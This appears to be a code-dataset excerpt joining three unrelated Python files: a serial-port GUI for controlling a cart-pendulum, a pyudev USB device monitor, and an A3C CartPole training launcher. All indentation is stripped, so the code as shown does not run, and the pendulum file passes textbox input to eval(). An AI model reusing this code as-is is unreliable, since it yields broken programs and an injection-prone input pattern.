self.ax_position = self.plotfig.add_subplot(pgs[1, :], sharex=self.ax_velocity)
plt.setp(self.ax_position.get_xticklabels(), visible=False)
self.ax_position.set_ylim([-0.25, 0.25])
self.ax_position.set_ymargin(0.0)
self.axCP = self.plotfig.add_subplot(pgs[4,:])
self.cartW = 0.08
self.cartH = 0.05
cmap = plt.get_cmap("tab10")
cartColor = cmap(0)
pendColor = cmap(1)
""" Plot cart pendulum animation"""
self.cart = Rectangle(np.array([0.0, 0.0]) - [0.5 * self.cartW, 0.5 * self.cartH], self.cartW, self.cartH, color = cartColor)
self.axCP.axhline(y=0, linewidth=2, color=cartColor)
self.ln = self.axCP.plot([],[], linewidth = 2, marker = '.', color = pendColor)[0]
self.axCP.axis('equal')
self.axCP.set_ylim([-0.6, 0.4])
self.axCP.set_xlim([-0.75, 0.75])
self.axCP.set_xlabel('Position (m)')
#
# Control Buttons figure
#
self.controlfig = plt.figure(tight_layout=False, dpi=192)
cgs = GridSpec(9, 9, figure=self.controlfig, width_ratios=[1.5,1.5,0.5,2,2,2,0.5,2,2],
top=.99, bottom=0.01, left=0.05, right=0.99,
wspace=0.05, hspace=0.05)
self.ax_notebox = self.controlfig.add_subplot(cgs[0, :2])
self.textbox_note = TextBox(self.ax_notebox, label=None, initial="Notes")
self.ax_button_record = self.controlfig.add_subplot(cgs[1, 0])
self.button_record = Button(self.ax_button_record, 'Record')
self.button_record.hovercolor = "red"
self.ax_durationbox = self.controlfig.add_subplot(cgs[1, 1])
self.textbox_duration = TextBox(self.ax_durationbox, label=None, initial="10")
self.ax_button_cosine = self.controlfig.add_subplot(cgs[2, 0])
self.button_cosine = Button(self.ax_button_cosine, 'Cosine')
self.ax_button_step = self.controlfig.add_subplot(cgs[2, 1])
self.button_step = Button(self.ax_button_step, 'Step')
# self.ax_button_cosine_pid = self.controlfig.add_subplot(cgs[3, 0])
# self.button_cosine_pid = Button(self.ax_button_cosine_pid, 'Cos (PID)')
#
# self.ax_button_step_pid = self.controlfig.add_subplot(cgs[3, 1])
# self.button_step_pid = Button(self.ax_button_step_pid, 'Step (PID)')
# self.ax_button_pid = self.controlfig.add_subplot(cgs[4, 0:2])
# self.button_pid = Button(self.ax_button_pid, 'Set Gains')
self.ax_button_calib = self.controlfig.add_subplot(cgs[6, 0:2])
self.button_calib = Button(self.ax_button_calib, 'Calibrate')
self.ax_button_disable = self.controlfig.add_subplot(cgs[7, 0:2])
self.button_disable = Button(self.ax_button_disable, 'Disable')
# self.ax_textbox_pid_p = self.controlfig.add_subplot(cgs[6, 5])
# self.ax_textbox_pid_p.set_title("Gains")
# self.textbox_pid_p = TextBox(self.ax_textbox_pid_p, label="kP ", initial="1.0")
# self.ax_textbox_pid_i = self.controlfig.add_subplot(cgs[7, 5])
# self.textbox_pid_i = TextBox(self.ax_textbox_pid_i, label="kI ", initial="0.0")
# self.ax_textbox_pid_d = self.controlfig.add_subplot(cgs[8, 5])
# self.textbox_pid_d = TextBox(self.ax_textbox_pid_d, label="kD ", initial="0.0")
#
self.ax_textbox_cos_mag = []
self.ax_textbox_cos_freq = []
self.ax_textbox_cos_phase = []
self.textbox_cos_mag = []
self.textbox_cos_freq = []
self.textbox_cos_phase = []
for ndx, i in enumerate(range(1,5)):
self.ax_textbox_cos_mag.append(self.controlfig.add_subplot(cgs[i, 3]))
self.ax_textbox_cos_freq.append(self.controlfig.add_subplot(cgs[i, 4]))
self.ax_textbox_cos_phase.append(self.controlfig.add_subplot(cgs[i, 5]))
if ndx == 0:
self.ax_textbox_cos_mag[-1].set_title("Mag (norm.)")
self.ax_textbox_cos_freq[-1].set_title("Freq (Hz)")
self.ax_textbox_cos_phase[-1].set_title("Phase (s)")
self.textbox_cos_mag.append(TextBox(self.ax_textbox_cos_mag[-1], label=str(ndx+1)+" ", initial="0.0"))
self.textbox_cos_freq.append(TextBox(self.ax_textbox_cos_freq[-1], label=None, initial="0.0"))
self.textbox_cos_phase.append(TextBox(self.ax_textbox_cos_phase[-1], label=None, initial="0.0"))
self.ax_textbox_step_mag = []
self.ax_textbox_step_phase = []
self.textbox_step_mag = []
self.textbox_step_phase = []
for ndx, i in enumerate(range(1,9)):
self.ax_textbox_step_mag.append(self.controlfig.add_subplot(cgs[i, 7]))
self.ax_textbox_step_phase.append(self.controlfig.add_subplot(cgs[i, 8]))
if ndx == 0:
self.ax_textbox_step_mag[-1].set_title("Mag (norm.)")
self.ax_textbox_step_phase[-1].set_title("Delay (s)")
self.textbox_step_mag.append(TextBox(self.ax_textbox_step_mag[-1], label=str(ndx+1)+" ", initial="0.0"))
self.textbox_step_phase.append(TextBox(self.ax_textbox_step_phase[-1], label=None, initial="0.0"))
def set_mode_color(self, active_button):
self.button_cosine.color = "lightgrey"
self.button_step.color = "lightgrey"
# self.button_pid.color = "lightgrey"
self.button_calib.color = "lightgrey"
self.button_cosine.hovercolor = "whitesmoke"
self.button_step.hovercolor = "whitesmoke"
# self.button_pid.hovercolor = "whitesmoke"
self.button_calib.hovercolor = "whitesmoke"
active_button.color = "limegreen"
active_button.hovercolor = "lightgreen"
class PendulumController(object):
PENDULUM_LENGTH_M = 0.335
Lfrac = 0.1
RADS_PER_COUNT = math.pi/512.0
METERS_PER_COUNT = 0.00009347
MODE_BUTTON_CONTROL = b'\x00'
MODE_CALIBRATE = b'\x01'
MODE_UART_CONTROL = b'\x02'
MODE_COSINE_CONTROL = b'\x03'
MODE_STEP_CONTROL = b'\x04'
MODE_PID_ANGLE_SPEED_CONTROL = b'\x05'
MODE_PID_ANGLE_POS_CONTROL = b'\x06'
ACTION_CODE = b'\x0A'
ACTION_DISABLE = b'\x00'
ACTION_ENABLE = b'\x01'
ACTION_RESET_CLOCK = b'\x02'
MESSAGE_HEADER = b'DEF'
STATUS_HEADER = b'ABC'
STATUS_FORMAT = "<fiiiic"
STATUS_LENGTH = struct.calcsize(STATUS_FORMAT)+len(STATUS_HEADER)
DATA_RATE_HZ = 100
MAX_DATAPOINTS = 1000
PLOT_WINDOW = 1000
def __init__(self, port='COM1'):
self.ser = serial.Serial(port=port,
baudrate=256000,
bytesize=8,
parity='N',
stopbits=1,
timeout=None)
self.gui = PenConGui()
self.gui.button_record.on_clicked(self.record_button_cb)
self.gui.button_disable.on_clicked(self.action_disable)
self.gui.button_step.on_clicked(self.step_button_cb)
self.gui.button_calib.on_clicked(self.calib_button_cb)
self.gui.button_cosine.on_clicked(self.cosine_button_cb)
# self.gui.button_pid.on_clicked(self.pid_button_cb)
self.gui.controlfig.canvas.mpl_connect('close_event', self.shutdown)
self.gui.plotfig.canvas.mpl_connect('close_event', self.shutdown)
x = np.linspace(-self.PLOT_WINDOW/self.DATA_RATE_HZ, 0, self.PLOT_WINDOW)
y = np.sin(x)
self.motor1_counts_plot, = self.gui.ax_position.plot(x, y, color='blue')
self.angle_plot, = self.gui.ax_angle.plot(x, y, color='red')
self.motor1_cps_plot, = self.gui.ax_velocity.plot(x, y)
self.motor1_command_plot, = self.gui.ax_velocity.plot(x, y)
self.motor1_setpoint_plot, = self.gui.ax_velocity.plot(x, y)
self.ani = animation.FuncAnimation(self.gui.plotfig,
self.animate,
init_func=self.init,
interval=30,
blit=True,
frames=self.data_write_loop,
repeat=True)
self.gui.ax_angle.legend(["Pendulum Angle (radians)"], loc="upper left")
self.gui.ax_position.legend(["Cart X position (meters)"], loc="upper left")
self.gui.ax_velocity.legend(["Motor Velocity (counts/second)", "Motor Command", "PID Setpoint"], loc="upper left")
self.dataqueue = queue.Queue(maxsize=self.PLOT_WINDOW)
self.plotdata = np.empty((self.PLOT_WINDOW, 5))
self.recorddata = np.empty((self.MAX_DATAPOINTS, 5))
self.record_count = 0
self.recording = threading.Event()
self.stopping = threading.Event()
self.serial_read_thread = threading.Thread(target=self.serial_read_loop)
self.serial_read_thread.start()
self.data_write_thread = threading.Thread(target=self.data_write_loop)
self.data_write_thread.start()
def __del__(self):
self.close_serial()
def close_serial(self):
self.ser.close()
print("serial port closed")
def set_button_mode(self):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_BUTTON_CONTROL)
self.ser.write(b'\n')
def calibrate(self, event=None):
self.action_enable()
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_CALIBRATE)
self.ser.write(b'\n')
def calib_button_cb(self, event):
self.gui.set_mode_color(self.gui.button_calib)
self.calibrate()
def set_motor_speed(self, normalized_speed):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_UART_CONTROL)
self.ser.write(bytes(struct.pack('f', normalized_speed)))
self.ser.write(b'\n')
def set_cosine_mode(self, cosinetriplets):
#cosinetriplets should be an iterable of tuple triplets for magnitude, freq., and phase
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_COSINE_CONTROL)
self.ser.write(bytes([len(cosinetriplets)]))
for triplet in cosinetriplets:
print(triplet)
self.ser.write(bytes(struct.pack('fff', float(triplet[0]), float(triplet[1]), float(triplet[2]))))
self.ser.write(b'\n')
def cosine_button_cb(self, event):
self.gui.set_mode_color(self.gui.button_cosine)
triplets = []
for i in range(len(self.gui.textbox_cos_mag)):
trip = [float(self.gui.textbox_cos_mag[i].text),
float(self.gui.textbox_cos_freq[i].text),
float(self.gui.textbox_cos_phase[i].text)]
if trip[0] == 0.0:
continue
else:
triplets.append(trip)
self.set_cosine_mode(triplets)
self.action_reset_clock()
self.action_enable()
def set_step_mode(self, steppairs):
#steppairs should be an iterable of tuple pairs for magnitude, and phase
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_STEP_CONTROL)
self.ser.write(bytes([len(steppairs)]))
print(bytes([len(steppairs)]))
for pair in steppairs:
print(pair)
self.ser.write(bytes(struct.pack('ff', float(pair[0]), float(pair[1]))))
self.ser.write(b'\n')
def step_button_cb(self, event):
self.gui.set_mode_color(self.gui.button_step)
steppairs = []
for i in range(len(self.gui.textbox_step_mag)):
pair = [float(self.gui.textbox_step_mag[i].text),
float(self.gui.textbox_step_phase[i].text)]
if pair[0] == 0.0:
continue
else:
steppairs.append(pair)
self.set_step_mode(steppairs)
self.action_reset_clock()
self.action_enable()
def record_button_cb(self, event):
self.action_reset_clock()
self.action_enable()
self.gui.button_record.set_active(False)
self.record_count = 0;
self.MAX_DATAPOINTS = self.DATA_RATE_HZ * int(eval(self.gui.textbox_duration.text))
self.recorddata = np.empty((self.MAX_DATAPOINTS, 5))
self.recording.set()
def action_enable(self, event=None):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.ACTION_CODE)
self.ser.write(self.ACTION_ENABLE)
self.ser.write(b'\n')
def action_disable(self, event=None):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.ACTION_CODE)
self.ser.write(self.ACTION_DISABLE)
self.ser.write(b'\n')
def action_reset_clock(self):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.ACTION_CODE)
self.ser.write(self.ACTION_RESET_CLOCK)
self.ser.write(b'\n')
def set_pid_speed_mode(self, kP, kI, kD):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_PID_ANGLE_SPEED_CONTROL)
self.ser.write(bytes(struct.pack('fff', kP, kI, kD)))
self.ser.write(b'\n')
def set_pid_position_mode(self, kP, kI, kD):
self.ser.write(self.MESSAGE_HEADER)
self.ser.write(self.MODE_PID_ANGLE_POS_CONTROL)
self.ser.write(bytes(struct.pack('fff', kP, kI, kD)))
self.ser.write(b'\n')
def pid_button_cb(self, event):
self.gui.set_mode_color(self.gui.button_pid)
def serial_read_loop(self):
while(not self.stopping.wait(0.0)):
if self.ser.in_waiting > self.STATUS_LENGTH:
if self.ser.read(1) == b'A':
if (self.ser.read(2) == b'BC'):
line = self.ser.readline()
if(len(line)==21):
rawvalues = struct.unpack(self.STATUS_FORMAT, line)[:-1]
#print(self.convert_values(rawvalues))
self.dataqueue.put(self.convert_values(rawvalues))
self.close_serial()
def data_write_loop(self):
while(not self.stopping.wait(0.0)):
while(not self.dataqueue.empty()):
try:
newrow = self.dataqueue.get_nowait()
self.plotdata = np.vstack((self.plotdata[1:, :], newrow))
if self.recording.is_set():
self.recorddata[self.record_count, :] = newrow
self.record_count+=1
if self.record_count >= self.MAX_DATAPOINTS:
self.recording.clear()
np.savetxt("pendulum_data_"+datetime.datetime.now().strftime("%B%d%Y_%I%M%p")+".csv",
self.recorddata, delimiter=',',
header=self.gui.textbox_note.text+"\n"+
"timestamp_s, angle_rad, position_m, velocity_mps, motor_command")
self.gui.button_record.set_active(True)
except queue.Empty:
pass
yield self.plotdata
def shutdown(self, event=None):
self.stopping.set()
plt.close('all')
def convert_values(self, rawvalues):
timestamp_s = rawvalues[0]
angle_rad = rawvalues[1]*self.RADS_PER_COUNT
position_m = rawvalues[2]*self.METERS_PER_COUNT
velocity_mps = rawvalues[3]#*self.METERS_PER_COUNT
motor_command = rawvalues[4]
return timestamp_s, angle_rad, position_m, velocity_mps, motor_command
def pendulumEndPts(self, x, theta):
PEP = np.array([np.array([x, 0]) + (1 - self.Lfrac) * self.PENDULUM_LENGTH_M * np.array([np.sin(theta), -np.cos(theta)]), \
np.array([x, 0]) - self.Lfrac * self.PENDULUM_LENGTH_M * np.array([np.sin(theta), -np.cos(theta)])])
return PEP[:,0], PEP[:,1]
def init(self):
self.angle_plot.set_ydata([np.nan] * self.PLOT_WINDOW)
self.motor1_counts_plot.set_ydata([np.nan] * self.PLOT_WINDOW)
self.motor1_cps_plot.set_ydata([np.nan] * self.PLOT_WINDOW)
self.motor1_command_plot.set_ydata([np.nan] * self.PLOT_WINDOW)
self.motor1_setpoint_plot.set_ydata([np.nan] * self.PLOT_WINDOW)
self.gui.axCP.add_patch(self.gui.cart)
self.gui.ln.set_data(*zip((0,0), (0,0) + self.PENDULUM_LENGTH_M * np.array([np.sin(0), -np.cos(0)])))
return self.angle_plot, self.motor1_counts_plot, self.motor1_cps_plot, self.motor1_command_plot, self.motor1_setpoint_plot, self.gui.cart, self.gui.ln
def animate(self, data):
self.angle_plot.set_ydata(data[:,1])
self.motor1_counts_plot.set_ydata(data[:,2])
self.motor1_cps_plot.set_ydata(data[:,3])
self.motor1_command_plot.set_ydata(data[:,4])
self.motor1_setpoint_plot.set_ydata([0]*len(data[:,4]))
self.gui.cart.set_xy(np.array([data[-1, 2], 0]) - [0.5 * self.gui.cartW, 0.5 * self.gui.cartH])
px, py = self.pendulumEndPts(data[-1, 2],data[-1, 1])
self.gui.ln.set_data(px, py)
return self.angle_plot, self.motor1_counts_plot, self.motor1_cps_plot, self.motor1_command_plot, self.motor1_setpoint_plot, self.gui.cart, self.gui.ln
if __name__ == "__main__":
pendcon = PendulumController(port="COM7")
plt.show()
|
device_monitors.py
|
#Copyright 2013 Pieter Rautenbach
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# System imports
import logging
import threading
from time import sleep
# Constants
_VENDOR_ID_KEY = 'ID_VENDOR_ID'
_PRODUCT_ID_KEY = 'ID_MODEL_ID'
_ACTION_KEY = 'ACTION'
_ADD_ACTION = 'add'
_REMOVE_ACTION = 'remove'
class BaseDeviceMonitor(object):
'''
Base class for constructing different device monitors.
'''
def __init__(self,
logger=logging.basicConfig()):
'''
Base constructor.
:param logger: local logger instance
'''
self._logger = logger
self.event_handlers = {'add': None,
'remove': None}
self.running = False
self._runLock = threading.Lock()
def _get_add_event_handler(self):
'''
The method for handling the event when a device was added.
'''
return self.event_handlers[_ADD_ACTION]
def set_add_event_handler(self, handler):
'''
Set a method for handling the event when a device was added.
:param handler: A parameterless void method.
'''
self._logger.debug('Setting a new add event handler: {0}'.
format(handler))
self.event_handlers[_ADD_ACTION] = handler
def _get_remove_event_handler(self):
'''
The method for handling the event when a device was removed.
'''
return self.event_handlers[_REMOVE_ACTION]
def set_remove_event_handler(self, handler):
'''
Set a method for handling the event when a device was removed.
:param handler: A parameterless void method.
'''
self._logger.debug('Setting a new add event handler: {0}'.
format(handler))
self.event_handlers[_REMOVE_ACTION] = handler
class PyUdevDeviceMonitor(BaseDeviceMonitor):
'''
A wrapper class for pyudev for detecting when a specific USB device is
connected or disconnected.
'''
def __init__(self,
vendor_id,
product_id,
udev_module,
logger=logging.basicConfig()):
'''
Constructor.
:param vendor_id: the USB device's vendor ID
:param product_id: the USB device's product ID
:param callback: the method to evoke when the monitored device changed
:param logger: local logger instance
'''
super(type(self), self).__init__(logger=logger)
# pyudev provide the values as hex strings, without the 0x prefix
# and exactly 4 digits, e.g. 0xa12b becomes a12b
self._vendor_id = vendor_id
self._product_id = product_id
# Event callback handler as a closure
def _device_event_handler(device):
vendor_id = int(device[_VENDOR_ID_KEY], 16)
product_id = int(device[_PRODUCT_ID_KEY], 16)
self._logger.debug('Device event handler invoked for '
'vid_%0#6x, pid_%0#6x',
vendor_id, product_id)
if (not vendor_id == self._vendor_id or
not product_id == self._product_id):
self._logger.debug('Device does not match the \
required VID and PID \
(vid_%0#6x, pid_%0#6x)',
self._vendor_id,
self._product_id)
return
add_event_handler = self._get_add_event_handler()
remove_event_handler = self._get_remove_event_handler()
if (device[_ACTION_KEY] == _ADD_ACTION and
not add_event_handler is None):
add_event_handler()
elif (device[_ACTION_KEY] == _REMOVE_ACTION and
not remove_event_handler is None):
remove_event_handler()
else:
self._logger.debug('Unknown device event or no handler')
context = udev_module.Context()
monitor = udev_module.Monitor.from_netlink(context)
monitor.filter_by(subsystem='usb', device_type='usb_device')
# Note that the observer runs by default as a daemon thread
self._observer = (udev_module.
MonitorObserver(monitor,
callback=_device_event_handler,
name='device_observer'))
def start(self):
'''
Start the device monitor.
'''
self._logger.info("Device monitor starting")
with self._runLock:
if self.running:
self._logger.warn("Device monitor already started")
return
self.running = True
self._observer.start()
self._logger.info("Device monitor started")
def stop(self):
'''
Stop the device monitor.
'''
self._logger.info("Device monitor stopping")
with self._runLock:
if not self.running:
self._logger.warn("Device monitor already stopped")
return
# CONSIDER: Test is_alive before stopping observer
self._observer.stop()
self.running = False
self._logger.info("Device monitor stopped")
class PollingDeviceMonitor(BaseDeviceMonitor):
'''
A polling device monitor when no event-driven support is available.
'''
def __init__(self,
device,
polling_interval=1,
logger=logging.basicConfig()):
'''
Constructor.
:param device: a device
:param polling_interval: the polling period in seconds
:param logger: local logger instance
'''
super(type(self), self).__init__(logger=logger)
self._polling_interval = polling_interval
self._device = device
self._thread = threading.Thread(target=self._run)
def start(self):
'''
Start the device monitor.
'''
self._logger.info("Device monitor starting")
with self._runLock:
if self.running:
self._logger.warn("Device monitor already started")
return
self.running = True
self._thread.start()
self._logger.info("Device monitor started")
def stop(self):
'''
Stop the device monitor.
'''
self._logger.info("Device monitor stopping")
with self._runLock:
if not self.running:
self._logger.warn("Device monitor already stopped")
return
self.running = False
self._thread.join()
self._logger.info("Device monitor stopped")
def _run(self):
'''
Polling thread.
'''
while self.running:
# Transition from open to close (removed)
if self._device.is_open():
try:
self._logger.debug('Device open - polling')
if not self._device.poll():
self._device.close()
self._get_remove_event_handler()()
except IOError:
self._device.close()
self._get_remove_event_handler()()
# Transition from close to open (added)
else:
try:
self._logger.debug('Trying to open device')
self._device.open()
if not self._get_add_event_handler() is None:
self._get_add_event_handler()()
except IOError:
pass
self._logger.debug('Sleeping for {0} second(s)'.
format(self._polling_interval))
sleep(self._polling_interval)
|
main.py
|
import torch
import torch.multiprocessing as mp
import gym
from actor_nn import ActorNN
from critic_nn import CriticNN
from test_process import test_process
from train_process import train_process
if __name__ == '__main__':
#----------------------PARAMETERS-------------------------------
MAX_WORKER_GAMES = 1000
HYPERPARAMETERS = {
'lr_actor': 0.007,
'lr_critic': 0.01,
'gamma': 0.99,
'n-step': 20,
'entropy_flag': True,
'entropy_coef': 0.001,
'seed': 12,
'num_processes': 10,
'env_name': "CartPole-v1",
'max_train_games': 1000,
'max_test_games': 10,
'writer_test': False,
'writer_train': False,
'writer_log_dir': 'content/runs/AC3-16163232-2,3-n=2-e=001-seed=12++-10 ',
'print_test_results': True
}
#---------------------------------------------------------------
# Set manuel seed so other processes dont get same
torch.manual_seed(HYPERPARAMETERS['seed'])
# Create enviroment so we can get state (input) size and action space (output) size
env = gym.make(HYPERPARAMETERS['env_name'])
# We need to create two models which will be shared across workers
device = 'cpu'# 'cuda' if torch.cuda.is_available() else 'cpu'
shared_model_actor = ActorNN(env.observation_space.shape[0], env.action_space.n).to(device)
shared_model_critic = CriticNN(env.observation_space.shape[0]).to(device)
# Once the tensor/storage is moved to shared_memory, it will be possible to send it to other processes without making any copies.
# This is a no-op if the underlying storage is already in shared memory and for CUDA tensors. Tensors in shared memory cannot be resized.
shared_model_actor.share_memory()
shared_model_critic.share_memory()
# List of all workers/processes
processes = []
# We need to create shared counter and lock to safely change value of counter
counter = mp.Value('i', 0)
end_flag = mp.Value('i', 0)
lock = mp.Lock()
# We need to start test process which will take current ActorNN params, run 10 episodes and observe rewards, after which params get replaced by next, more updated ActorNN params
# All train processes stop when test process calculates mean of last 100 episodes to be =>495. After that we run for 90 more episodes to check if last params (used in last 10 episodes)
# are stable enough to be considered success.
p = mp.Process(target=test_process, args=(HYPERPARAMETERS, shared_model_actor, counter, end_flag))
p.start()
processes.append(p)
# We will start all training processes passing rank which will determine seed for NN params
for rank in range(0, HYPERPARAMETERS['num_processes']):
p = mp.Process(target=train_process, args=(HYPERPARAMETERS, rank, shared_model_actor, shared_model_critic, counter, lock, end_flag))
p.start()
processes.append(p)
# We are waiting for each process to finish
for p in processes:
p.join()
# For viewing live progress with tensorboard, open new CMD and type line below:
# tensorboard --logdir "D:\Users\Leon Jovanovic\Documents\Computer Science\Reinforcement Learning\deep-reinforcement-learning-pg-cartpole\A3C\content\runs" --host=127.0.0.1
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.